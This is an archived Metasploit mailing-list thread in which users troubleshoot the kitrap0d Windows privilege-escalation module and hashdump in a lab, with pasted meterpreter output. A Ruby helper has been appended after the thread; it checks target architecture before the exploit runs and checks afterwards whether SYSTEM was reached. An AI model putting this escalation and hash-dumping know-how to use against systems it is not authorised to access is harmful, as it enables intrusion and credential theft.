Metasploit mailing list archives
Re: Kitrap0d question
From: igor ransack <igor.ransack () gmail com>
Date: Fri, 29 Jan 2010 12:22:35 -0500
Hi guys, thanks for the suggestions, it all works fine now. A few questions have arisen since then, however. It seems that even with NT AUTHORITY\SYSTEM privileges under both Vista and 7, hashdump (under priv) as well as the "run hashdump" module are still giving me error 87:

    [-] priv_passwd_get_sam_hashes: Operation failed: 87

I was wondering if anyone has managed to successfully hashdump against Vista or Windows 7 so far using Metasploit. The only similar occurrence where I have seen it work is in a video on pauldotcom where he used it against Windows 2008 Server.

N.B.: Migrating to explorer.exe, or any kind of migrate as of today's build, entirely breaks the session stream. Possibly related, but I doubt it.

Again, any input is appreciated.

Thanks

On Fri, Jan 29, 2010 at 9:19 AM, Pavel Jirout <freedom.day () gmail com> wrote:
> Hi,
>
> try running the executable directly on that box. The binaries are located in /metasploit/data/exploits/kitrap0d; just copy the two files to a USB stick and execute on the Windows box. It works only on x86 systems as far as I know....
>
> Pavel
>
> On Thu, Jan 28, 2010 at 11:58 PM, igor ransack <igor.ransack () gmail com> wrote:
>> Hi again rapid7,
>>
>> as seen on HD's blog, the following video is a fine example:
>> http://vimeo.com/9028433
>>
>> After watching it, I decided to build a lab around this new module in order to understand it a bit better. Here is the output:
>>
>> meterpreter > sysinfo
>> Computer: SERVEUR
>> OS      : Windows 7 (Build 7600, ).
>> Arch    : x64 (Current Process is WOW64)
>> Language: fr_FR
>> meterpreter > run kitrap0d
>> [*] Currently running as Serveur\Xavier
>> [*] Loading the vdmallowed executable and DLL from the local system...
>> [*] Uploading vdmallowed to C:\Users\Xavier\AppData\Local\Temp\lKiNbiNIxRfeB.exe...
>> [*] Uploading vdmallowed to C:\Users\Xavier\AppData\Local\Temp\vdmexploit.dll...
>> [*] Escalating our process (PID:3128)...
>> --------------------------------------------------
>> Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
>> --------------------------------------------
>> taviso () sdf lonestar org
>> ---
>> [?] GetVersionEx() => 6.1
>> [?] NtQuerySystemInformation() => @00000000
>> [*] Deleting files...
>> [*] Now running as Serveur\Xavier
>> meterpreter >
>>
>> The only thing that comes to mind is the fact that the OS is French, but then again I doubt it; that would make very little sense at the kernel level... Also, I assume this exploit would not work under a 64-bit OS? I can reproduce this on a clean setup.
>>
>> Any info is appreciated.
>>
>> _______________________________________________
>> https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
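The two pieces of output pasted in this thread (the sysinfo listing showing an x64 host with a WOW64 meterpreter, and the kitrap0d run that ends with the same user it started with) can be turned into a pre-flight and a post-run check. The Ruby below is an added example, not code from the thread's authors or from the Metasploit project: it parses the `Key : value` layout of sysinfo and the "Currently running as" / "Now running as" lines exactly as they appear in the paste, and nothing else about the script's output is assumed. The sample inputs are constructed from the thread. (For the other question in the thread, Win32 error 87 is ERROR_INVALID_PARAMETER; the example does not try to diagnose it.)

```ruby
# Added example, not code from the thread's authors or from the Metasploit
# project. Pre-flight check on `sysinfo` for the x86-only constraint Pavel
# mentions, plus a post-run check on kitrap0d's own "running as" lines.
# Field names and line formats are assumed from the thread's paste.

# Constructed from the sysinfo listing in the thread (x64 host, WOW64 meterpreter).
SAMPLE_SYSINFO = <<~TXT
  Computer: SERVEUR
  OS      : Windows 7 (Build 7600, ).
  Arch    : x64 (Current Process is WOW64)
  Language: fr_FR
TXT

# Constructed from the "run kitrap0d" output in the thread (no escalation happened).
SAMPLE_RUN_OUTPUT = <<~TXT
  [*] Currently running as Serveur\\Xavier
  [*] Loading the vdmallowed executable and DLL from the local system...
  [*] Escalating our process (PID:3128)...
  [?] GetVersionEx() => 6.1
  [?] NtQuerySystemInformation() => @00000000
  [*] Deleting files...
  [*] Now running as Serveur\\Xavier
TXT

# Parse "Key : value" lines into a hash keyed by lower-cased field name.
def parse_sysinfo(text)
  info = {}
  text.each_line do |line|
    key, value = line.split(':', 2)
    next if value.nil?
    info[key.strip.downcase] = value.strip
  end
  info
end

# Pre-flight: returns [ok, reasons]. ok is false when the host is not x86
# or meterpreter itself is a WOW64 process, the two conditions visible in
# the thread's failed run.
def kitrap0d_precheck(sysinfo_text)
  info = parse_sysinfo(sysinfo_text)
  arch = info.fetch('arch', '')
  reasons = []
  unless arch.start_with?('x86')
    reasons << "target arch is #{arch[/\S+/] || 'unknown'}; the kitrap0d binaries are x86 only"
  end
  reasons << 'meterpreter is a WOW64 process, not a native one' if arch =~ /WOW64/i
  [reasons.empty?, reasons]
end

# Post-run: compare the user printed before and after escalation.
# Returns [status, before, after, warnings]; status is :escalated when the
# final user is NT AUTHORITY\SYSTEM, :unchanged otherwise, :unknown if the
# two lines are missing.
def escalation_result(run_output)
  before = run_output[/Currently running as (.+)$/, 1]
  after  = run_output[/Now running as (.+)$/, 1]
  warnings = []
  # The failed run in the thread printed a null address on this line.
  if run_output =~ /NtQuerySystemInformation\(\) => @0+$/
    warnings << 'NtQuerySystemInformation() returned a null address'
  end
  return [:unknown, before, after, warnings] if before.nil? || after.nil?
  before = before.strip
  after  = after.strip
  return [:escalated, before, after, warnings] if after.casecmp('NT AUTHORITY\SYSTEM').zero?
  [:unchanged, before, after, warnings]
end

if __FILE__ == $PROGRAM_NAME
  ok, reasons = kitrap0d_precheck(SAMPLE_SYSINFO)
  puts(ok ? 'precheck: ok' : "precheck: skip (#{reasons.join('; ')})")
  status, before, after, warnings = escalation_result(SAMPLE_RUN_OUTPUT)
  puts "result: #{status} (#{before} -> #{after})"
  warnings.each { |w| puts "warning: #{w}" }
end
```

Run against the thread's own paste, the pre-check refuses with two reasons (x64 host, WOW64 process) and the post-check reports `unchanged` with the null-address warning; against an x86 XP sysinfo it passes, and a run whose last line names NT AUTHORITY\SYSTEM is reported as `escalated`.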
Current thread:
- Kitrap0d question igor ransack (Jan 28)
- Re: Kitrap0d question Pavel Jirout (Jan 29)
- Re: Kitrap0d question igor ransack (Jan 29)
- Re: Kitrap0d question HD Moore (Jan 29)
- Re: Kitrap0d question HD Moore (Jan 29)
- Re: Kitrap0d question igor ransack (Jan 29)
- Re: Kitrap0d question c0lists (Jan 29)
- <Possible follow-ups>
- Re: Kitrap0d question jeffs (Jan 29)
- Re: Kitrap0d question HD Moore (Jan 29)
- Re: Kitrap0d question Pavel Jirout (Jan 29)